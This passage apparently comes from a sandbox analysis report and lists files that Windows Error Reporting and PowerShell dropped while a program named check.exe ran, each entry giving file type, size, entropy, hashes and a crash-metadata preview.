                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.9.1.3.9.7.1.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.9.8.1.1.5.9.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.0.c.5.a.e.3.-.0.6.6.e.-.4.8.3.7.-.9.e.e.8.-.2.f.0.c.f.1.3.d.2.4.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.a.f.6.4.b.a.-.1.1.6.1.-.4.9.9.c.-.a.9.8.e.-.1.9.7.8.0.b.1.7.a.e.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.0.-.0.0.0.1.-.0.0.1.4.-.7.8.e.e.-.1.6.0.c.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.3625482046086155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:kYCI8i0PRjSjoR6alVNmyk87YRAC/xLpI8uKGN5kvuwn7VVvMnXVFXv1SnYzuiF4:AI8pPRjSj8nwn5sRzuiFpY4lO80X
                                                                                                                                                                                                            MD5:C87506136314F8BCC7C85D6F7415D1E0
                                                                                                                                                                                                            SHA1:9CA18471BF62C06EFF75A6117269FF353A1E0C26
                                                                                                                                                                                                            SHA-256:7A3F3D1514F8BA9C1FAA2DB0920BAAEB32CA40ECE14B21458A79C748D7AA13D5
                                                                                                                                                                                                            SHA-512:47DE129B35CFD5AC74A49434810206DB8F78D12D974F7B425E96B28B5F48EE5A2C4776562EC97B0639B9870A6612A02553BC5ED06EEC85F8CB878164DE070DE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.8.1.7.7.3.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.9.6.7.7.3.7.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.1.3.a.c.5.-.7.a.2.d.-.4.e.4.f.-.8.7.3.d.-.4.f.d.4.8.1.8.d.8.8.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.1.d.3.a.5.-.a.4.7.8.-.4.2.f.4.-.a.d.5.c.-.9.5.4.f.6.1.5.5.4.0.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.3.0.-.0.0.0.1.-.0.0.1.4.-.2.d.2.e.-.3.7.f.d.5.4.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.362983291840391
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:JXfI6vi0PRjSjoR6NCiSmtbLU5JBQDm0GnrfKZiObIBwn76Vgrg+VF+v1SnYzuiO:xIqpPRjSjM/wn2BRzuiFpY4lO80X
                                                                                                                                                                                                            MD5:9D512D3AD258BE2FDC5693B77CBE7F40
                                                                                                                                                                                                            SHA1:55C04EB37CA678E22BF5A16733A56EFA6F42801D
                                                                                                                                                                                                            SHA-256:F902200B3165BA2BFA67E8A38704F99C8AA0D5B9741A1BEA37F9DD60B31D3237
                                                                                                                                                                                                            SHA-512:25AAB2A83AB90DC3E2BE627D76A3D5DF1C8FE96584660E8CF00B2A36EF3BDAFD3CD8663C66B04B9DFD756D14404AFCE38B798A214AAC865A7C01F905A7F8C9EF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.0.8.8.9.2.1.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.2.8.7.3.5.7.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.9.8.5.5.e.4.-.5.9.d.1.-.4.a.b.8.-.9.0.1.a.-.d.d.b.a.a.e.3.3.9.1.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.0.7.5.4.c.a.-.2.d.f.0.-.4.9.8.4.-.8.1.f.d.-.6.e.e.0.1.a.9.8.1.f.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.4.-.6.5.2.8.-.5.5.0.5.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:38 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131682
                                                                                                                                                                                                            Entropy (8bit):2.033331177758981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RiE0ROTa+WTurH0VC35OgVQnAx6v2GXtQCjPZKJNk55SepXdYBBhrf9gV:RF0ROe3urUic7AEg8PQeQepghrfmV
                                                                                                                                                                                                            MD5:F910FE767D0CC2CFAA2CD9090CBE9B44
                                                                                                                                                                                                            SHA1:0CEE5A50256A95D2E74773DE0862324424B5602D
                                                                                                                                                                                                            SHA-256:DBE766C5D49DE0B1A7722B6670213DB1A27E1BE232A068555684727D67393C58
                                                                                                                                                                                                            SHA-512:7746DAE5230976EAE7058CC60B381ECC27A51FE4A706D3C77715AA3FA996AEE13E0EB61358209DA0C3EAFC446C5DAFDC3759BD8F9A2E8EDCAFF1FC690D240C12
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-...........\..........`.......8...........T............%...............-.........../..............................................................................eJ......p0......Lw......................T.......0.....Wg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9606
                                                                                                                                                                                                            Entropy (8bit):3.7063099523546663
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ/HjW6YXO7j4gmfCyPpDM89bYRffxmom:R6lXJrW6Y+7j4gmfCyjYpfy
                                                                                                                                                                                                            MD5:EF4EFE033248B8CA03E4218D69D44915
                                                                                                                                                                                                            SHA1:68C66BABFAA3C1A58BCB3E3B22F2E4D026A9C6DE
                                                                                                                                                                                                            SHA-256:9E51C050DF6DC8F888A2C9A0C07638C89196234CBBA0853EAC77FD2085BA447E
                                                                                                                                                                                                            SHA-512:D2AF3A8E3733E80A9FCA2A2408349EE0637E5FA4C58A82B2A3ED02F4B459DA9C109FCD7E2EFFA57A3DD2A51ADE1D3FCC79E1BE3DEAB67C7A24F51AEFC7B270E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.2.0.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4735
                                                                                                                                                                                                            Entropy (8bit):4.4368483080124905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I90A4XWpW8VYeoYm8M4JbWDFPHyq8vuWZnMZDQcS2d:uIjfpI7dA4m7VlFJS1HW3dMlC2d
                                                                                                                                                                                                            MD5:E88E4BB34F2EC1E585227346F765BFC5
                                                                                                                                                                                                            SHA1:1ABF8F89DDEE95F85067FD0AFB7869CF946ADBB9
                                                                                                                                                                                                            SHA-256:AC5CCA2A0A5ADD98E7D79909D908B375A930862A8FF2097B97081F7608DAD7EB
                                                                                                                                                                                                            SHA-512:BF41AEF62EBC702718A1534B59A52D09BAE21EB1325B5960252E4795002661384035D6E2B3961C87381E248AB0FB5CCF1E3B853B9D8EC2DF703CF3E366886917
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:51 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131352
                                                                                                                                                                                                            Entropy (8bit):2.0525147452072816
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Fwr0b7oo4urHkVCsblfBOLDuqVlU1akE+CAj4prT6A7oJ7jUUv+6Lllw:Fwr0bkHurEZBfB8DjbkdRAEui9
                                                                                                                                                                                                            MD5:2582CFB1CE597578B0BBAE78FFC4322E
                                                                                                                                                                                                            SHA1:37B263CDAE3B70939EFD17E0B5096BCFBD077E18
                                                                                                                                                                                                            SHA-256:FE58060ADC1EA487490BE6BE095B9FBC75DF6E2965E92AABEAD7CEF529848A6F
                                                                                                                                                                                                            SHA-512:3165CC8D077B00B3765B6DC32F32CE6241813B355CFA2A1FE303BFABF903A96A0AFAC46A7939C5BA8F8DDA0060C151ADA9035BB446F1A81D80686F8544A03F04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-......4....\..........`.......8...........T............&..p............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9608
                                                                                                                                                                                                            Entropy (8bit):3.7041942756246935
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJpY+z6YYsfbIgmfCyPpDM89bPRmafUWFm:R6lXJmE6YjfbIgmfCyjPQafS
                                                                                                                                                                                                            MD5:0CC50DFDD431E2A12F3902B96F9ED303
                                                                                                                                                                                                            SHA1:406863E9F56129C157E4666DC3E30480A8D42454
                                                                                                                                                                                                            SHA-256:057CC31EB492004A9C06B2606BB90A7F487E6774C0CA0215E52C49AD90BA3CA9
                                                                                                                                                                                                            SHA-512:81993E2ADCB8D6433277BFB417E29FF1E8FFD1D1573DD2CA0A3DF379C29F209A11DB4D5FC57C3F20AD65674439C42D64334743F32613FD3EAE443AA635F2AC5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4735
                                                                                                                                                                                                            Entropy (8bit):4.437615934918471
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I90A4XWpW8VYUYm8M4JbWDFHVoyq8vuWdMZDQcSid:uIjfpI7dA4m7VYJSEW3dMlCid
                                                                                                                                                                                                            MD5:5DF6B0F1936BF15DEE280D73143DEEF9
                                                                                                                                                                                                            SHA1:8183E15C536F8765D6E1505C003F4F7D51BD50C9
                                                                                                                                                                                                            SHA-256:1620D50DE4E027612C01E69F970400745612A718506D28B7033323C30426612F
                                                                                                                                                                                                            SHA-512:B92E2CE19A2FD97C639C1BF479AB7E18D9EDD7B3FE177159BDD306EF8F511E24301E19AB78168140B455B8EFCB58F134F9F37C0EC3E2238EB1E68BF3D3553B8D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:59 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131462
                                                                                                                                                                                                            Entropy (8bit):2.0674248670429765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:m0n0Zeg3WrHkVCX2kHABo37ZrwqJohU0uO2SF8nq/JjN34XYsxsFkP6TmxTxcPkz:ln0ZR3WrE6LA8ZklMNzmaP6wxc+3Br
                                                                                                                                                                                                            MD5:BD5CBCBEF15649A49DCCFE8262830BF0
                                                                                                                                                                                                            SHA1:4557EF4C1B535B07734106811ADC362BCF8C0D9F
                                                                                                                                                                                                            SHA-256:FB41DA1D7141876842A855A1C9DD5020C5D42A1405BB04CB49F273EC69952622
                                                                                                                                                                                                            SHA-512:A4022D0CB43643680F8C167C395A7EDA712894D008279C7F9808F1F55C90698181A9E7FB2F2D043348F096035C6B97D65BAC5719ECB28921C3EE4073BDACF105
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-......4....\..........`.......8...........T...........X&...............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9604
                                                                                                                                                                                                            Entropy (8bit):3.704881367562772
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJydTQ2o6YImkbIgmfCyPpDy89bHEef7tm:R6lXJc26Y5kbIgmfCyhH1fc
                                                                                                                                                                                                            MD5:B42F765B017006BAD7624E2D27029B9B
                                                                                                                                                                                                            SHA1:F944C5F9CD41F2E01CBF8B1275CC3B618011507F
                                                                                                                                                                                                            SHA-256:D86320FACD9324587AFFEE2ECF9E7607E8E3C6A6348C7F52BE8D2E3394CE05F2
                                                                                                                                                                                                            SHA-512:BED016C90A1B2D3D024A9B40BF76E139BD9CAEB3F5274E8C2FD7FF7D3F9325AFC14D739E5D564DC77CF2200F028876B933B05716003772439305E82EB57617CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.3.6.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4735
                                                                                                                                                                                                            Entropy (8bit):4.4354878026506155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I90A4XWpW8VYNYm8M4JbWDF6Fyq8vuW/PMZDQcSCd:uIjfpI7dA4m7V9JSaW3/PMlCCd
                                                                                                                                                                                                            MD5:C01227DF613757977CDE9F2A4478E3F3
                                                                                                                                                                                                            SHA1:DB6CCAC2EF230171C4A35292F1CEDC3664990E2F
                                                                                                                                                                                                            SHA-256:43FD0839C7828A219DA6E973759A953EDBCB6750378562BE92E0BBA707776F48
                                                                                                                                                                                                            SHA-512:29EFA0AAB40F77F2837FEBDC2007CC09D96DD0C09F3832540C71497EB2F6B5D9899922299374AD06951397462E3FF87F29C478F4704DF858E0C3070F16907F38
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1464
                                                                                                                                                                                                            Entropy (8bit):5.324263531310648
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:3cSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:sSU4y4RQmFoUeCamfm9qr9trBLNGhNuw
                                                                                                                                                                                                            MD5:70FA0FADD826A7D0307F844E27B94A1C
                                                                                                                                                                                                            SHA1:1690972399B411C8F3030539021EC07AB45CE9EE
                                                                                                                                                                                                            SHA-256:0BD95ADAC82E29FCAAA196F77C4D1F00C3DA36AC3C8582718FAA3174B3EC8602
                                                                                                                                                                                                            SHA-512:B4E66BEE2F75E2B5F1E2CDCE217C54A5C1C5AA93D7BDA4335729663BDED61D6EEF355C40D0CD36304A56FCFBC684C92359BA2AF5F6E786C616AB962C1CE0D37A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
